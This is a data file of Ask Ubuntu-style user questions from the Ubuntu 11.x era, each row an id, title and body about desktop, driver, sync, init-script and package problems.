72089	external monitor stopped working after updating yesterday	i 'm on ubuntu 11.04 . i downloaded and installed some updates ( i do n't know which ) through update manager yesterday and now my external monitor stopped working . when i connect it to my laptop ( thinkpad t420 , with intel hd graphics ) the laptop screen goes blank and the external screen flickers , shows some random garbage but mostly remains blank . what should i do ? can i somehow revert updates i have made yesterday ? since everything worked just fine then ...
72099	how to install a libreoffice dictionary ( spelling check , thesaurus ... )	what are the steps to install the spelling check and other language supports for libreoffice . for example spanish , french , italian , etc..
72104	.passw hidden files in /etc	rkhunter reported me that it found hidden files in /etc : warning : hidden file found : /etc/.group.48239632746 : ascii text warning : hidden file found : /etc/.passwd.13046384800 : ascii text warning : hidden file found : /etc/.passwd.14350544901 : ascii text warning : hidden file found : /etc/.passwd.16941124733 : ascii text warning : hidden file found : /etc/.passwd.22154181091 : ascii text warning : hidden file found : /etc/.passwd.48239632746 : ascii text should i be worried about it ? it seems those files are copies of the original passwd file ... . regards
72105	my gnome shell in ubuntu is the old-style gnome 2.0 style	i have upgraded from natty to oneiric . i want to use gnome shell 3 in oneiric , and have installed it from the repository . when i login i see the old gnome 2 . * style desktop . is this the expected result ? should n't the interface be the same as gnome-shell . i am confused since different posts on the internet are showing both interfaces .
72111	does ubuntu one require administrator privileges ?	ubuntu one works when i login as administrator , but can not synchronize if i use the normal account ( see also here : ubuntu one does not sync : firewall settings ? ) . is that normal ?
72118	how do i add an own program to the `` open with '' menu	after installing oneiric i 'm not able to add my own scripts to the `` open with '' menu in ubuntu ( i 've been using lucid up to now ) . adding the scripts to /usr/local/bin or /usr/bin my applications still do n't show up in the `` open with '' menu .
72119	how do i restore default settings and configuration , but keep local data , installed apps , and ppas ?	i 'm fairly new to ubuntu and while messing around with different things and trying out some shells , i 've managed to mess my system up . specifically i really messed up my gnome session and ca n't get it to run really at all . is there a way to backup my apps but reinstall or just `` restore '' ubuntu to its original condition ? i had tons of updates installed , downloaded and setup my machine for android development , and a few other things with a very slow internet connection .
72121	what is a realistic date for the kernel power regressions fixes ?	linux kernel has cumulated multiple power management regression bugs which make systems affected barely usable . a system that works at 30/30 temperatures on windows during office work may work on linux at 70/65 while staring at the desktop without any programs being actively used . the power usage / batery drain of course go along with the temperatures . there are no fixes to the problems yet . just partial temporary `` solutions '' http : //ubuntuforums.org/showthread.php ? t=1865820 can someone share his knowledge / prediction / estimate on a realistic release date for the fixes ? ( please say which of these you 're posting ) this will help me to make a decision on further steps until the real fixes to the kernel arrive : trash linux and install windows do a kernel downgrade do kernel downgrades to fix power regressions in newer kernels ? edit : the timeline of the past linux kernel releases so judging upon the history of the kernel releases it 's safe to say that waiting is not a good choice .
72122	how to install xorg-x11-fonts	i need to install xorg-x11-fonts . i was searching in google how to install them but could n't really find anything . i need it for ubuntu 11.04 .
72123	how to write an init script that will execute an existing start script ?	i 'm trying to understand the init process . i have a script which launches 3 background processes ( 2 shell scripts and a java app ) . it works just fine from the command line . i 'd like to execute that script at startup . /etc/init.d/skeleton did n't make sense to me because it was looking for a single process it seemed . and most init scripts seems so complex i 'm getting sort of lost . all i really want to do is : # ! /bin/bash /opt/myapp/bin/my_start_script if that just happened at startup i 'd be very happy .
72124	how to turn off digital output on my imac ?	i just installed ubuntu 11.10 i386 32-bit on ma imac ( 21 '' , c2d 2.66 , 4gb ram ) but i have a problem that i ca n't solve out : the audio is not working , after a lot of struggles with alsa , i found out that , at the back of the pc , there is the red light coming out from the headphones socket . ( macs have the output thing that works as analog if you put an analog jack , and as digital if you put an optical ( longer ) special jack inside . ubuntu sends out a digital output instead of sending sound to the iternal speakers . codec : realtek alc889a help me !
72125	how to convert tiff scan file to jpeg or png general file format in ubuntu ?	how can i convert this scanned file to general jpeg/png ? i used scanimage -- mode=color -- format=tiff > /tmp/testing.tiff from a scanner $ convert -seperate testing.tiff testing.jpeg convert : unrecognized option `-seperate ' @ error/convert.c/convertimagecommand/2667 . $ convert -seperate -format jpg testing.tiff testing.jpg convert : unrecognized option `-seperate ' @ error/convert.c/convertimagecommand/2667 .
72127	when you run `update-rc.d myscript default` - what is called on startup/shutdown ?	what gets called on startup/shutdown when you run update-rc.d myscript default ? docs seem fuzzy , i want concrete . i am guessing that this happens : at startup ( specifically at entry to runlevel 2 , multiuser ) , this command is executed : /etc/init.d/myscript start and at shutdown/reboot the same script is called as : /etc/init.d/myscript stop is that all that is really happening here ?
72133	extremely slow first-time sync/upload : 29 mb in 3 days ?	i installed ubuntu one on my windows 7 machine 3 days ago and selected to synchronize my entire my documents folder , which consists of ~3 gb of data . i was expecting it to take a while , but now i 've had ubuntu one running ( and supposedly syncing ? ) files for 3 days , and the status of the ubuntu one app still says i 've only managed to upload 29 mb ! i read the faq ( https : //one.ubuntu.com/help/faq/why-is-it-taking-so-long-for-my-files-to-sync/ ) and understand that it might be a capacity issue , but i still feel the need to ask because even with sporadic server issues , this upload speed is almost a joke if this is supposed to be normal . am i just having bad luck or a faulty install or something ? or is it really meant to be this slow ? with this speed , it will take approximately 300 days to complete the upload ! : ) many thanks for an otherwise ( seemingly ) great service !
72136	changing screen brightness	i have a hp pavilion dv6 with xubuntu installed . however there is n't a way to change the screen brightness , i tried the fn plus scroll keys to no avail , any ideas ?
72144	gbirthday - is there a way to let it work with unity	i use the very useful and small birthday ( and more ) reminder tool gbirthday a lot , but it seems not to work with unity . is there a way to tweak this , so gbirthday works in ubuntu with unity ? normally there would be a small icon in the panel , but i guess unity does not like `` foreign '' items in the panel . thanks for the attention , but this is not a duplicate . i intentionally posted two different questions , to get different answers : first how to make gbirthday work with unity . secondly are there any alternatives to gbirthday . are n't these two different questions ? please open this question again , thanks in advance .
72145	do you know any birthday reminder alternative to gbirthday ?	i use the very useful and small birthday ( and more ) reminder tool gbirthday a lot , but there is no unity indicator for it ( at least not yet , unless someone creates it ) and you have to whitelist the notification applet for the panel . is there a good alternative birthday reminder that works with unity ? and that gets the dates from the evolution addressbook/calendar ? or a tool that gets the dates from a file that can be easily created with evolution , so it can be done regularly ? thanks !
72146	selecting desktop environment on recovery mode	i wan na select the gnome environment on the recovery mode at the grub screen since i installed kubuntu desktop on ubuntu 11.10 and failed . i can see the kubuntu logo , the blue screen but it just disappears suddenly , so i ca n't enter in . so is there such a command that works on recovery mode ? thanks a lot in advance !
72150	updating bios and ubuntu 11.10.. seem like they do n't mix	i recently update mi bios firmware , and when i try lo load up ubuntu 11.10 , it stays halted at a purple screen , it wont even boot . if i then reboot and go to my vista partition , everything is working fine . in order for ubuntu 11.10 to boot i need to revert my bios firmware to the original . why is it so ? some thing i noticed when flashing the new bios firmware is that it changed the time on the bios , even though i corrected it , it still did n't boot . i then decided to stay with the original bios firmware in order to boot ubuntu , but i would like to update it . for example , if i reboot my system with the original bios , it will do everything , but except the act of rebooting itself , it just stays stuck on a blank screen , but powered on . but with the new firmware it works great , but not ubuntu wont boot . any help from the community will be greatly appreciated .
72152	no operating system detected at boot , how can i retrieve my data ?	i upgrade from ubuntu 11.04 to 11.10 during its beta stage , and everything was working great despite a couple error messages . but suddenly lightdm started acting up , when i would type my password to log in the screen would flash and bring me straight back to lightdm . then one day i booted to a message similar to `` gnu grub version 1.99 ubuntu . minimal bash-like editing is supported . type help for complete list . '' i reasoned i messed things up , thus i took a live cd to simply copy all my files to an external hard drive so i could reinstall ubuntu . but when i go to my root folder there is only boot/grub/etc . i recall my home folder became encrypted by it 's self prior to this error . how can i get all my data back ? thats all i 'm concerned about , not so much about reviving ubuntu , i will simply reinstall it . edit : ubuntu @ ubuntu : / $ sudo fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a1e49 device boot start end blocks id system /dev/sda1 * 1 14465 116183040 83 linux /dev/sda2 14465 14594 1035265 5 extended /dev/sda5 14465 14594 1035264 82 linux swap / solaris disk /dev/sdb : 2021 mb , 2021654016 bytes 64 heads , 63 sectors/track , 979 cylinders units = cylinders of 4032 * 512 = 2064384 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 1 969 1953439+ c w95 fat32 ( lba )
72154	how do i get two finger scrolling working on an acer s3 elantech touchpad ?	i installed ubuntu 11.10 on the acer s3 ultrabook and i am trying to get the touchpad to work with two button scrolling . when i go to system settings - > mouse and touchpad i do n't see any touchpad preferences there , only basic mouse settings . when i run xinput i get the following : virtual core pointer id=2 [ master pointer ( 3 ) ] virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ps/2 elantech touchpad id=11 [ slave pointer ( 2 ) ] does anyone know how to get the touchpad working ?
72155	ubuntu 10.04 nvidia drivers	i 've just downloaded and installed ubuntu 10.04 on a asus n43s laptop with geforce gt 550m cuda 1gb . however the only screen resolution i can take is 1024*768 . system - > administration - > hardware drivers , does not show me anything that could be installed . i am all out of options at the moment , any help appreciated ! have a great evening ! jack
72161	brightness shortcuts do n't work on on an acer 4741	when i press fn+down and fn+up ( the shortcuts for change brightness ) , it shows the indicator that the brightness has change , but its not change at real . i 've use this method screen brightness not changing on acer 5742 notebook after reboot , it just make the resolution down at 1024 x 768 is it need to update bios ? thanks , and sorry for my bad english
72172	eclipse menus are slow to render and disappear	i have just installed eclipse in ubuntu 11.10 and i 'm noticing the menus ( in the application 's menubar ) are slow to render and disappear . i have not explored many more aspects of the program as this just put me off completely . is this a known issue and is there anything i can do to fix it as i know eclipse to be a very good application . possibly a java issue ?
72175	rhythmbox and banshee do not start anymore	i searched a little and tried your topic banshee is n't starting anymore , but i still had no success yet . so i will explain my problem shortly and then post the error-messages : both players worked fine until rhythmbox suddenly crashed and did n't start any more . so i tried banshee ( they are both installed on my system ) and it crashed after a few seconds while scanning for new media and does n't start any more either . both players can be started from other users , for example as sudo or at the guest-account . so there is possibly something wrong with the user , but i do n't know what . so , thanks for your help ! here are the error-messages : rhythmbox ( rhythmbox:8836 ) : gtk-critical ** : gtk_style_provider_get_style_property : assertion `g_type_is_a ( gtk_widget_path_get_object_type ( path ) , pspec- > owner_type ) ' failed ( rhythmbox:8836 ) : gtk-critical ** : gtk_style_provider_get_style_property : assertion `g_type_is_a ( gtk_widget_path_get_object_type ( path ) , pspec- > owner_type ) ' failed ( rhythmbox:8836 ) : gtk-critical ** : gtk_style_provider_get_style_property : assertion `g_type_is_a ( gtk_widget_path_get_object_type ( path ) , pspec- > owner_type ) ' failed ( rhythmbox:8836 ) : gtk-critical ** : gtk_style_provider_get_style_property : assertion `g_type_is_a ( gtk_widget_path_get_object_type ( path ) , pspec- > owner_type ) ' failed ( rhythmbox:8836 ) : gtk-critical ** : gtk_style_provider_get_style_property : assertion `g_type_is_a ( gtk_widget_path_get_object_type ( path ) , pspec- > owner_type ) ' failed /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject typeerror : metaclass conflict : the metaclass of a derived class must be a ( non-strict ) subclass of the metaclasses of all its bases ** error : /build/buildd/pygobject-3.0.0/gi/_gobject/pygobject.c:929 : pygobject_new_full : assertion failed : ( tp ! = null ) aborted banshee [ info 02:59:35.413 ] running banshee 2.2.0 : [ ubuntu oneiric ( development branch ) ( linux-gnu , x86_64 ) @ 2011-09-23 04:47:58 utc ] exception in gtk # callback delegate note : applications can use glib.exceptionmanager.unhandledexception to handle the exception . system.argumentexception : value does not fall within the expected range . at hyena.gui.canvas.rect.set_width ( double value ) [ 0x00000 ] in < filename unknown > :0 at hyena.gui.canvas.rect.op_explicit ( rectangle rect ) [ 0x00000 ] in < filename unknown > :0 at hyena.data.gui.listview`1 [ banshee.collection.albuminfo ] .onsizeallocated ( rectangle allocation ) [ 0x00000 ] in < filename unknown > :0 at gtk.widget.sizeallocated_cb ( intptr widget , intptr allocation ) [ 0x00000 ] in < filename unknown > :0 at glib.exceptionmanager.raiseunhandledexception ( system.exception e , boolean is_terminal ) at gtk.widget.sizeallocated_cb ( intptr widget , intptr allocation ) at gtk.widget.gtksharp_widget_base_show ( intptr ) at gtk.widget.onshown ( ) at nereid.playerinterface.onshown ( ) at gtk.widget.shown_cb ( intptr widget ) at gtk.widget.gtk_widget_show ( intptr ) at gtk.widget.show ( ) at banshee.gui.baseclientwindow.initialshowpresent ( ) at nereid.playerinterface.initialize ( ) at banshee.gui.baseclientwindow.initializewindow ( ) at banshee.gui.baseclientwindow..ctor ( system.string title , system.string confignamespace , int32 defaultwidth , int32 defaultheight ) at nereid.playerinterface..ctor ( ) at system.reflection.monocmethod.internalinvoke ( system.reflection.monocmethod , system.object , system.object [ ] , system.exception byref ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) at system.activator.createinstance ( system.type type , boolean nonpublic ) at system.activator.createinstance ( system.type type ) at banshee.servicestack.servicemanager.registerservice ( system.type type ) at banshee.servicestack.servicemanager.run ( ) at banshee.servicestack.application.run ( ) at banshee.gui.gtkbaseclient.initialize ( boolean registercommonservices ) at banshee.gui.gtkbaseclient..ctor ( boolean initializedefault , system.string defaulticonname ) at banshee.gui.gtkbaseclient..ctor ( ) at nereid.client..ctor ( ) at system.reflection.monocmethod.internalinvoke ( system.reflection.monocmethod , system.object , system.object [ ] , system.exception byref ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) at system.activator.createinstance ( system.type type , boolean nonpublic ) at system.activator.createinstance ( system.type type ) at banshee.gui.gtkbaseclient.startup ( ) at hyena.gui.cleanroomstartup.startup ( hyena.gui.startupinvocationhandler startup ) at banshee.gui.gtkbaseclient.startup ( ) at banshee.gui.gtkbaseclient.startup ( system.string [ ] args ) at nereid.client.main ( system.string [ ] args ) at system.appdomain.executeassembly ( system.appdomain , system.reflection.assembly , system.string [ ] ) at system.appdomain.executeassemblyinternal ( system.reflection.assembly a , system.string [ ] args ) at system.appdomain.executeassembly ( system.string assemblyfile , system.security.policy.evidence assemblysecurity , system.string [ ] args ) at system.appdomain.executeassembly ( system.string assemblyfile ) at booter.booter.bootclient ( system.string clientname ) at booter.booter.main ( )
72177	how to set up a custom keyboard layout ?	i wish i could design a keyboard layout of my own ( specifying symbols for each the key to be entered in case it is pressed alone , with shift or with altgr ) and set it up among all the other layouts in my xubuntu 11.04 system . how to do this ?
72178	should i buy a laptop with ati/amd on it ?	i use ubuntu on all my machines . i 'm looking at a few laptops right now to replace a failing desktop : a lenovo with a amd e 350 processor and integrated graphics ( 4 gigs of ddr3 ram ) toshiba with an athlon 2.2ghz with an ati radeon 4250 graphic chip ( 3 gigs of ddr3 ram ) and one machine is a gateway with a pentium p6200 2.1 ghz with integrated hd graphics ( 6 gigs of ddr3 ram ) i wo n't be gaming , but i will be using this laptop to stream high definition video to my 46 '' tv and i would like the video to be smooth as silk . i wo n't be gaming at all . will either of the amd laptops work `` out of the box ? '' will the gateway be a better choice ? cheers !
72181	how is ssh started during init ?	how does the ssh daemon start on ubuntu server ? i see /etc/init.d/ssh , but i do n't see any sym-links to it from the rc ? .d directories . i have a situation i 'm trying to troubleshoot where a server becomes unresponsive on reboot after i add my own script to the shutdown/startup process with update-rc.d client-services defaults 98 02 on reboot , ssh shuts down , and that 's the last i hear of the box ( i do n't have console or syslog access so i 'm working blind here ) .
72184	restoring virtualbox machine images from old hard drive	i recently replaced the hdd in my laptop , and re-installed windows & ubuntu . now i want to restore the various virtual machines i had set up on the old hdd , which is mounted in an external usb enclosure . i can read the hdd okay , and the 'bad ' spots seemed to be in the windows partition ... but whenever i try to restore the vdi files the copy errors out . i 've tried drag-n-drop in nautilus , i 've tried grsync , etc . always bombs out on the vdi files . i 've copied over multi-gb dvd iso images with no problem , but the vdi files always fail the checksums . any ideas ? tia , monte
72187	windows directory not syncing	i have 2 windows directories that are not syncing . i added 2 directories that are in my home directory . c/users/owner . the directories show in the listing in windows and in cloud file , but none of the files are uploaded . i have 3 other directories that are syncing ok
72188	muon package manager stuck at 100 %	i 've tried to install the lubuntu desktop package through muon package manager in kubuntu 11.10 , downloading and installing went fine , however it is stuck at 100 % , it 's been already 30 mins . and i ca n't restart the computer as muon cancels the logout process . what do i do now ? should i just turn off the computer manually ? or just let muon finish whatever it 's doing ? , there 's no drive activity by the way .
72191	ca n't install `` meld ''	i 'm trying to install meld on ubuntu ( i use virtualbox on windows 7 ) in order to visualize git diff : sudo apt-get install meld but , it does n't succeed : ... get:9 http : //au.archive.ubuntu.com/ubuntu/ oneiric/main python-pyorbit i386 2.24.0-6ubuntu1 [ 92.4 kb ] get:10 http : //au.archive.ubuntu.com/ubuntu/ oneiric/main python-gnome2 i386 2.28.1-3 [ 361 kb ] get:11 http : //au.archive.ubuntu.com/ubuntu/ oneiric/universe python-gtksourceview2 i386 2.10.1-2 [ 131 kb ] fetched 1,310 kb in 6s ( 214 kb/s ) failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/main/p/pygtk/python-glade2_2.24.0-2_i386.deb size mismatch failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/universe/m/meld/meld_1.5.2-1ubuntu2_all.deb size mismatch failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/main/p/pyorbit/python-pyorbit_2.24.0-6ubuntu1_i386.deb size mismatch failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/main/g/gnome-python/python-gnome2_2.28.1-3_i386.deb size mismatch failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/universe/p/pygtksourceview/python-gtksourceview2_2.10.1-2_i386.deb size mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? what could be the problem , and how could i install meld properly ?
72193	can i sync files between computers without the cloud storage ?	i am looking to drop windows live mesh and have been playing around with ubuntu one . so far i love it , but i ca n't seem to find a way to sync folders between my computers and bypass the online ( 5gb ) storage . i have about 150gb i need to sync between 5 computers , only about 4gb worth of it needs to be on the cloud . is this possible ? i remember reading somewhere that in 11.10 , this might be possible . if this feature is not implemented yet , does anyone have any idea when we can expect to see this ?
72197	how do i install my graphics driver for dell latitude d620 ?	i have a dell latitude d620 with 11.10 on it , and i am wondering how to install intel or intel-compatible drivers for my integrated video card .
72198	where is the accessories folder located ?	i installed notifyosd config but i ca n't find the accessories folder in ubuntu 11.10 where notifyosd should be located . does anyone know where it is or how to open it ?
72201	generate package download script using terminal	i connect to the internet in windows using a vodafone gprs connection . i do n't know how to configure it on ubuntu , so my ubuntu os can not be online . hence repository updates and software updates are difficult . so i had been browsing the internet for a solution for 3 months now . i found the solution to this problem by manually adding repositories and then generating a package download script using synaptics . i was happy using gnome desktop . but the recent version of ubuntu is using unity and by default synaptic is not installed . could you provide me a solution for this ? my main concern is that i can manually add repositories but how can i generate the download script using the terminal ? this is giving me headache !
72205	when copying files and the focus is changed the file copy status window is no longer available	in ubuntu 11.10 using gnome shell i use nautilus to copy or move files between open tabs . when i press alt tab and change focus to a different application and then come back to nautilus to check the status of the task i sometimes can not access the file copy status window . there seems to be no handle on the file copy/move/delete status window so i have to guess using disk space and disk activity when the copy is complete . how can i make this status window persistent .
72206	image viewer : mouse wheel to move back and forward	in the gnome image viewer ( 3.2.0 ) , i would like to change these shortcuts for next/prev image to use the mousewheel . i would also like to change it in shotwell if possible . current the mousewheel is assigned to zoom in/out on the current image , which i almost never need . i 've tried setting on desktop/gnome/interface/can_change_accels in gconf-editor but no luck . i have found where i think i should edit , in ~/.config/eog/accels , there are lines like ; ( gtk_accel_path `` < actions > /menuactionsgallery/goprevious '' `` < alt > left '' ) ; ( gtk_accel_path `` < actions > /menuactionsgallery/gonext '' `` < alt > right '' ) which i guess i should uncomment ( remove semicolon ) and assign to something else , but what could be the accel for mouse wheel events ?
72208	print screen key does n't work if a drop-down menu is active	on 11.10 , i do n't get a screengrab when pressing the print screen button on my keyboard if i have activated a drop down menu . for example , in nautilus , i can click the file menu and press the print screen button , nothing happens . deactivating the drop down menu and all other things being equal , it works . is that normal ? often when using this thing i 'm actually needing to show some of those menu options . currently i use the workaround to grab after a delay of a few seconds , but i 'm used to the print screen button working no matter what 's in focus and would prefer it that way .
72215	how to install notifyosd-config ?	i 'm using ubuntu 11.10 and i tried to install notifyosd-config to no avail using the following code from this thread : how do i change how long notifications are displayed ? sudo add-apt-repository ppa : leolik/leolik sudo add-apt-repository ppa : amandeepgrewal/notifyosdconfig sudo apt-get update sudo apt-get upgrade sudo apt-get install notifyosdconfig but it does n't appear in the accessories folder , and the last message i get using sudo apt-get install notifyosdconfig is : e : unable to locate package notifyosdconfig i want to change the time of the bubble notification because it displays too long and change where it appears . thank you in advance . i also tried this code from this thread : why are notifications so low ? sudo add-apt-repository ppa : leolik/leolik sudo add-apt-repository ppa : amandeepgrewal/notifyosdconfig sudo apt-get update & & sudo apt-get install notifyosdconfig it did n't work either . any suggestions on how to make notifyosd-config work ?
72219	many /run files missing after upgrade to 11.10	i 've upgraded from 11.04 to 11.10 and now i am missing the majority of files in /run ( my other 11.10 machine has 44 files/folders in /run while the broken system has only 11 ) . one of the main missing folders is /run/network which makes my networking not work on startup . also , possibly related when i do a normal boot i get a blank x screen with an x cursor . after killing x and doing a manual startx , x loads rather well , i can see notifications from notifysend ( such as guake and dropbox ) and can run some x programs ( my autostarted synergy works well ) . i should mention that my upgrade did not go smoothly and did something like give an error that the upgrade did not complete successfully , followed by a message that my upgrade did complete successfully .
72221	gnome 3 and compiz , everything works except explode and leaf spread animations	i am using 11.10 with gnome 3 , i have installed compiz , and have got it functioning almost how i want it . i want my windows to leaf spread , which seems to work fine for a few minutes after i enable it and restart my machine . however , over the time of a few window closes , i notice that the objects are not showing up little by little until the leaf spread just does n't show at all ? this really is n't a big deal , but i 'd like things to work properly . can anyone shed some light on this ?
72224	gnome shell weather extension is not showing correct weather information	i am on ubuntu 11.10 and i have installed gnome shell extensions . for the weather extension the problem is that it is only showing the temperature that it showed when installed for the first time . that means while the current temperature is 25 it is continuing to show it as 32 . i have entered the correct woeid . need your help to solve this issue .
72226	how to delete lazarus completely ?	some time ago lazarus began to work incorrect ( `` the project uses target os linux and i386 '' ) . it does n't work at all now - i ca n't compile even an empty program . i tried to remove lazarus several times . but after new installation i have the same problem . in the past i had n't such problem . what does in mean ? i think , some components of lazarus remain after the removal of lazarus . i tried to use synaptic , apt-get remove/autoremove/purge , but useless . what else can i do ?
72228	ca n't mount windows 7 share on ubuntu 11.10	installed ubuntu 11.10 64bit today and got to a problem . ca n't connect to windows 7 shared folders . i have tried every single method i could find on google . mount with `` mount cifs '' , `` smbmount '' , changed homegroups , etc and no luck . windows 7 is clean setup with no-password sharing enabled . other windows computers can access shares without a problem . on ubuntu i can see windows 7 under windowsnetworks- > workgroup > but nothing . edit : it looks like now i can see shares of other windows 7 computer ( with login and password ) but not the one i need ( without login and password )
72229	'unreachable ' home folder	occasionally , when i log into my ubuntu server , the prompt says jon @ jon-server : ( unreachable ) / $ . running pwd at this point returns ( unreachable ) / , however echo $ home returns /home/jon as expected . if i cd then i get taken to my actual home folder . what could be the reasons for this ? it does n't seem to cause any problems , apart from public key authentication with ssh ( presumably if it ca n't see the home folder then it ca n't get to the .ssh folder inside it ) . it seems to be consistent until restart - that is , every new shell will do this , until i restart , when it will either work normally or not . this has been happening for at least the last few release upgrades , so not related to oneiric . i selected the installer option to encrypt my home folder .
72233	why does grub only load on every other attempted boot ?	after upgrading to 11.10 , grub does n't load on every other boot ( all the odd number boots , for example ) . it just sits at a purple screen and waits for me to reboot the computer to load grub again . any idea what this is or how to fix it ? i have n't had much luck googling for it . i checked dmesg and /var/log but found nothing suspicious . would n't dmesg be from the resulting successful boot and not from the previous failed boot ?
72234	customizing gnome shell animations	how do i change/edit the animations in gnome shell ? for example , i want to use the `` glide '' animation for opening applications but gnome shell uses `` fade '' . any way i can do that ?
72240	recover xorg.conf from read only terminal	after changes in my xorg.conf , i can not restart x anymore . so on grub i choose , limited vodeo mode , then `` root prompt '' . though it seems to be a read only access , so i can not replace my current xorg.conf by my saved one . i tried to use chmod , but without success , i get a message : '' changing permissions for xorg.conf : read access only '' even though i entered `` chmod 666 xorg.conf '' how can i modify or delete my current xorg.conf in such a scenario ? thanks for the help !
72245	black screen on latest nvidia/ati cards when starting lightdm/ubuntu	today i installed an nvidia gt440 on my computer , changing the one that existed there , an nvidia 9500gt . after changing it i started getting a problem where the screen just went black when loading the lightdm login screen ( where i punt my user and password ) . the thing is , if i disconnect the vga cable and connect it again i get to see the lightdm greeter and everything works perfect . the problem is that i have to connect/disconnect every time i reboot the pc . i tried installing the 285.xx drivers . same problem . i removed the nvidia drivers installed with jockey , rebooted , same problem . i install the current 280.xx again , same problem . after all that i installed a fresh install of ubuntu , selected to install the nvidia drivers while installing it from the livecd . after booting the same problem appeared . dmesg does not say anything wrong about it . same goes for the log from jockey . what else should i check or what to do to solve it . just to clarify , this does not happen before the lightdm greeter appears . am guessing before the actual use of the video card with x starts with all the 2d/3d stuff that is used in ligthdm and unity . i can use any tty and even see the ubuntu logo when starting . update : when i open a game in fullscreen the problem appears again . i have to unplug the monitor cable and plug it back in to see the game . then when i quit the game i have to do it again to see the desktop . update 2 : today i bought a hdmi cable , connected the video card to the tv am testing it with and it actually did log in correctly without any black screen but it shows the resolution a little over the actual size of the screen . so i see only half of the launcher since the left side of it is hidden outside of the real resolution and the top bar is beyond the resolution . so the black screen is related to the vga connection . update 3 - after installing 12.04 and updating or installing 12.10 , black screen problems are gone .
72247	dash search function does not work in 11.10 after upgrade	the search function does not work in dash after upgrading from 11.04 to 11.10 . how do i fix this ?
72250	enabling the power management for sata link	after tearing down my laptop , i came to know that most of the heating issue in my laptop is caused by hdd . powertop is also showing the same problem . i am seeing significantly cooling after activating the power saving mode using the powertop but it is not permanent . in next reboot it will again reset . > powertop output : bad enable sata link power management for /dev/sda i have already activated the laptop-mode tool and set all the hdd power option in laptop-mode.conf file , but non of them resolving my problem . how can i make the powertop suggestion permanent ?
72257	vpn no longer works , saves old password ?	i am not sure if this question is related to 11.10 or gnome 3.2 , but the vpn configuration screen has changed , and now the user and password is optional , but there is no way for me to override it . on our vpn we use a token , so i have to enter the password each time . but even if i clear the password , clear the password and the user , there is no way for me to unset the user and password , so i am unable to access the vpn . because he never asks the password anymore , and each time i return to the vpn configuration window , i see the same setting . please help . is there another way to configure the vpn ?
72258	dependency is not satisfiable : libnotify1 ( > = 0.5.0 )	i am trying to install deb file but getting following error , please help ! dependency is not satisfiable : libnotify1 ( > = 0.5.0 )
72266	is it possible to programmatically call , access , or get results from the unity dash ?	background after eyeing unity 's notification apis for the past few releases , i 've developed an itch to write a feed reader that syndicates new arrivals in the messaging menu ... ... and provides search in the dash . it would be nice to open the dash straight from the messaging menu , directly to the feed lens searching a selected term . look at the pictures above to see what i mean . question essentially , is there a unity api to : summon the dash ? set the dash 's active lens ? set the dash 's search term ? thanks .
72267	how to allow execution without using the sudo ?	i am writing a java application where i need to do a command line execution and get a result back , but when i execute the command , it ask for sudo password . so far i tried : $ sudo -s $ vim /etc/sudoers # user privilege specification root all= ( all : all ) nopasswd : all javauser all= ( all : all ) nopasswd : all : wq $ 4 -r -- r -- -- - 1 root root 615 2011-10-26 09:23 sudoers once i execute the command it again asks `` [ javauser ] password for javauser : '' . but i already mentioned nopasswd . whoami returns alex and i am adding it as this in the sudoers file # user privilege specification root all= ( all : all ) all alex all=nopasswd : all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all running keeps asking me for my password , any ideas ?
72277	virtualization of windows on ubuntu 11.10 64 bit	which is better and more efficient ? kvm or virtual box for using windows on ubuntu 64 bit ? i dont know much about kvm and i have used xp on ubuntu 10.10 32 bit using virtual box , and it is very easy to use and along with guest additions you will have usb support too . does kvm have any gui ? what would be recommended configuration of pc , if i would like to run software like matlab , photoshop , etc on the windows virtual machine .
72278	'select file ' dialog is always shown at an incorrect position	for some reason the 'select file ' dialog is always shown at an incorrect position - it is always shifted to the right bottom corner . so , the 'save ' or 'open ' buttons are not showing and it is always necessary either to resize the dialog or maximize it . the problem has began to occur after upgrading to ubuntu 11.10 . the snapshot below demonstrates the issue . how i can fix it ?
72280	switching between places and tree sidebar modes quits nautilus	i have the following issue in my system ( 11.10 - gnome3 ) . when switching between places and tree sidebar modes nautilus quits suddenly . when i open it again the mode i selected is active . i realize that 's a minor bug , but i use this a lot it would be great if someone can provide me a workaround . the described behavior does not happen always ... sometimes it just works . thank you .
72283	unity features not working after upgrade to 11.10	i had purchased an hp pavilion with the unsupported graphics card radeon hd 6470m . i chose to not install the ati proprietary drivers and simply work with the generic ones . after my upgrade to 11.10 i noticed that after installing the ati drivers ( not the post-release ones , as apparently people have been having issues with unity ) , my graphics card is working well . however , the unity plugin was unchecked in compiz . i have rechecked it but nothing has changed . no matter what i check or uncheck in compiz ( like wobbly windows ) , there is no visual effect ( these effects all worked with the generic drivers ) . even my desktops are in the a straight line format and not in the 2x2 orientation , which gives problems when i press super+s . is there something i need to do to activate unity again ? should i reset it ? any other advice will be appreciated .
